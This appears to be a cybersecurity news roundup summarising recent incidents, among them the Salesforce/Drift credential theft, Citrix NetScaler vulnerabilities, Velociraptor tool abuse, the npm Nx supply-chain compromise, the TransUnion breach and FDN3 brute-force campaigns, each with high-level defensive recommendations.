Salesforce Targeted in Widespread Credential Theft Campaign
A recent, large-scale credential theft operation has targeted Salesforce customers, leading to systematic data exfiltration and raising concerns over supply chain vulnerability. The attack’s advanced tactics and operational discipline have prompted speculation about nation-state involvement.
Indicators and Attack Scope
Between August 8 and August 18, attackers focused on extracting sensitive credentials such as AWS keys, passwords, and Snowflake tokens from multiple Salesforce instances. Security teams observed structured queries designed to enumerate and harvest the most valuable secrets. The attackers attempted to cover their tracks by deleting evidence of jobs executed, a marker of sophisticated tradecraft.
Mitigation and Response Actions
Third-party platform Salesloft revoked all Drift–Salesforce app connections in response, requiring administrators to reauthenticate. Salesforce has temporarily removed the Drift integration from its AppExchange while investigations continue. Google, among others, urged all Drift users to assume compromise, rotate potentially exposed credentials, revoke API keys, and perform thorough log audits for any signs of anomaly.
Attribution and Defensive Guidance
Security experts, including AppOmni’s CSO, believe the operational scale and discipline suggest the involvement of a state-affiliated group. The campaign is distinguished by focused queries for credential objects and post-compromise cleanup efforts. Organizations aligned with best practices are advised to promptly remove non-essential integrations and deploy enhanced monitoring on platform credentials, especially in cloud-based environments where supply chain attacks cause cascading risk.
Citrix NetScaler ADC and Gateway Flaws Under Active Exploit
Citrix has disclosed three new vulnerabilities affecting NetScaler ADC and Gateway products, including a zero-day flaw already under exploitation in the wild. These bugs pose considerable risk to remote access infrastructure, especially among organizations still running unsupported versions.
Technical Details of Disclosed Vulnerabilities
The most severe flaw, CVE-2025-7775, is a memory overflow bug with a 9.2 severity rating. It enables remote attackers to execute arbitrary code, take control, or crash vulnerable NetScaler appliances—without authentication. Systems with active VPN, remote access, IPv6 configurations, or advanced content routing are particularly exposed. Two further issues, CVE-2025-7776 (CVSS 8.8) and CVE-2025-8424 (CVSS 8.7), allow denial-of-service attacks or improper data access, respectively.
Risk Amplification Factors
Analysts highlight the significant risk due to a prevalence of unsupported NetScaler versions. Almost 20% of Internet-facing NetScaler devices are believed to be out-of-date, leaving them “ticking time bombs.” While these new flaws affect components similar to last year’s “CitrixBleed” vulnerabilities, they are technically unrelated.
Incident Response and Prevention
Security professionals recommend urgent patching or upgrading of NetScaler appliances, alongside rigorous network segmentation and access controls. Comprehensive forensic review should be conducted for signs of remote compromise, including unexpected process executions and configuration changes in VPN and related modules.
Attackers Abuse Velociraptor Incident Response Tool for Compromise
Adversaries have begun exploiting the open-source Velociraptor digital forensics and incident response (DFIR) tool to gain persistence and deploy further payloads within compromised environments. This new abuse vector emphasizes the evolving threat landscape surrounding security tool supply chains.
Abuse Methods and Technical Mechanisms
Attackers are leveraging Velociraptor’s script extensibility and agent deployment capabilities, using the platform’s legitimate features to automate lateral movement, execute custom commands, and maintain footholds. In observed cases, adversaries repurpose Velociraptor configuration profiles, integrating their own PowerShell loaders, Cobalt Strike beacons, and data exfiltration commands inside routine scanning or artifact collection modules.
Defensive Recommendations
Security teams are advised to treat Velociraptor and similar DFIR tools as high-risk assets, limiting their deployment to dedicated, segmented administration networks. Implement strict access controls, monitor tool configurations for unauthorized changes, and regularly audit command execution logs. A strong software signing policy and periodic integrity verification of tool binaries can minimize the risk of supply chain manipulation or internal abuse.
npm ‘Nx’ Supply-Chain Attack Leaks Thousands of Sensitive Files
The npm package ecosystem has suffered another supply-chain attack involving the widely used ‘Nx’ CI pipeline tool. Malicious actor intervention led to the exposure of nearly 20,000 sensitive files from affected development environments.
Attack Vector and Technical Analysis
The compromise occurred when versioning of the Nx package was manipulated to include a post-install script designed to search, bundle, and transmit local project files to a remote host controlled by the attacker. Targeted files included .env secrets, configuration files, and OAuth tokens stored in development directories. The script evaded basic static analysis tools due to obfuscated logic and staged execution, leveraging process environment variables to target popular continuous integration and testing platforms.
Mitigation Techniques
Developers and organizations using npm should immediately audit their dependency trees for anomalous versions of Nx, particularly those released in August 2025. Instituting control measures such as package integrity checks, lockfile validation, and automated static analysis for post-install hooks is recommended. Organizations may also benefit from network monitoring for outbound connections from build environments, especially those matching known Nx compromise indicators.
TransUnion Breach Compromises Data of 4.4 Million Individuals
Credit reporting agency TransUnion has disclosed a data breach impacting approximately 4.4 million people. The incident highlights ongoing risks with storing and processing high volumes of sensitive personal information.
Breach Details and Data Exposure
Attackers reportedly accessed internal systems through a combination of credential compromise and lateral privilege escalation. Exfiltrated files contained identity information, credit data, and social security numbers. The attackers exploited weaknesses in third-party cloud storage configurations, gaining persistent access to backend data aggregation systems before being detected.
Incident Response and Consumer Protection
TransUnion initiated a comprehensive review of access controls and cloud platform configurations, working with law enforcement and outside consultants. Affected individuals are being notified and offered identity protection services. The breach follows recent market-wide regulatory scrutiny of credit agencies’ security practices, raising the urgency for implementing zero trust architectures and more aggressive access limitation policies in high-value data sectors.
Ukrainian Network FDN3 Launches Large-Scale Brute-Force Attacks Leveraging Seychelles Bulletproof Hosting
The FDN3 Ukrainian network has initiated a major brute-force campaign targeting SSL VPN and RDP assets, utilizing infrastructure linked to Seychelles-based bulletproof hosts and offshore peers. The effort is believed to facilitate ransomware deployment.
Technical and Network Infrastructure Insights
The brute-force activity, peaking between July 6–8, 2025, involved prolonged password spraying across corporate endpoints, though analysis suggests the pattern matches established ransomware-as-a-service (RaaS) groups like Black Basta and RansomHub. FDN3’s operational overlap with other prefixes and hosting providers, including Russian-linked entities such as Alex Host LLC and Bulgarian spam networks, points toward sophisticated coordination among offshore ISPs.
Implications and Defensive Measures
The anonymity provided by Seychelles hosts, coupled with technical peering agreements and prefix hosting, underlines the challenges of attribution and takedown in international bulletproof infrastructure. Network defenders should prioritize adaptive password rate-limiting, aggressive IP reputation detection, and broad telemetry sharing to mitigate brute-force and initial access threats. Geofencing and extensive monitoring of traffic from known high-risk autonomous systems are also recommended for vulnerable organizations.
US CISA 2015 Safe Harbor Reauthorization Uncertainty Poses Threat Intelligence Risks
The impending expiration of the US Cybersecurity Information Sharing Act (CISA) 2015 has raised fears that legal uncertainty could impede threat intelligence sharing and weaken defenses against advanced attacks.
Potential Impact of Legislative Lapse
If not renewed by September 30, US companies may lose safe harbor protections essential for sharing cyber threat indicators, reducing automated feed participation and fragmenting sector collaboration. Legal hesitation will particularly affect incidents involving customer and employee data and could disrupt broad cross-industry detection pipelines.
Operational and Compliance Preparation
Organizations are advised to review internal sharing policies, update compliance guidance for legal teams, and develop contingency plans for narrowed information channels. Emphasis should be placed on trusted networks and privacy controls, with increased scrutiny of statutory safeguards surrounding personally identifiable information (PII).